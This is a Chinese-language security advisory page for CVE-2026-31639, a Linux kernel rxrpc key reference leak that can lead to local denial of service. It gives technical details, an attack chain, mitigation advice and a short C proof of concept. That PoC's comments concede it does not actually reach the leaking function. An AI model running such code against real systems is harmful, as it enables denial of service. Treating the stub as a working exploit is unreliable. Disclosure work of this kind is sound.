CVE-2026-31639 CVSS 5.5 中危

CVE-2026-31639: Linux内核rxrpc密钥引用泄漏漏洞

披露日期: 2026-04-24

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31639

漏洞类型

内存泄漏

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核的rxrpc组件存在一个安全漏洞，涉及密钥引用计数的管理。在创建客户端调用时，系统获取了密钥的引用，但在调用销毁时未能正确释放。这导致密钥引用计数泄漏，长期运行可能耗尽系统资源，引发拒绝服务攻击。

技术细节

该漏洞位于Linux内核网络子系统的rxrpc模块中。具体而言，在`rxrpc_alloc_client_call()`函数执行期间，代码会查找并获取一个密钥，增加其引用计数。然而，在调用销毁路径`rxrpc_destroy_call()`中，缺少了相应的`key_put()`操作来减少引用计数。攻击者可以通过本地低权限账户，利用该漏洞反复触发客户端调用的创建与销毁循环。每次循环都会导致密钥对象的引用计数异常增加且无法回收。随着时间推移，这种累积的内存泄漏将耗尽内核内存资源，最终导致系统崩溃或服务不可用，形成拒绝服务攻击。

攻击链分析

STEP 1

1. 获取访问权限

攻击者获取目标系统的本地低权限用户账户。

STEP 2

2. 触发漏洞

攻击者运行恶意程序，调用rxrpc接口反复创建和销毁客户端调用。

STEP 3

3. 资源泄漏

内核在每次调用创建时泄漏Key引用计数，导致内核内存资源无法释放。

STEP 4

4. 拒绝服务

随着资源耗尽，系统变得不稳定或崩溃，导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-31639: rxrpc Key Reference Leak
 * This code attempts to trigger the leak by creating rxrpc client calls.
 * Note: Actual triggering may require specific kernel configurations or AF_RXRPC socket operations.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>

// AF_RXRPC definition is usually in linux/rxrpc.h
#ifndef AF_RXRPC
#define AF_RXRPC 33
#endif

int main() {
    int sock, i;
    printf("[+] Starting PoC for CVE-2026-31639\n");
    
    // Loop to create sockets and simulate calls that trigger the allocation
    for (i = 0; i < 10000; i++) {
        sock = socket(AF_RXRPC, SOCK_DGRAM, AF_RXRPC);
        if (sock < 0) {
            perror("socket");
            continue;
        }
        
        // In a real exploit, specific sendmsg or ioctls would trigger
        // rxrpc_alloc_client_call which leaks the key.
        // This demonstrates the pattern of resource usage.
        
        close(sock);
    }
    
    printf("[+] Completed. Check /proc/keys for leaked afs keys.\n");
    return 0;
}

影响范围

Linux Kernel (修复前版本)

防御指南

临时缓解措施

如果业务不依赖rxrpc功能，建议禁用该内核模块或限制本地用户对相关系统调用的访问权限，以减少被攻击面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表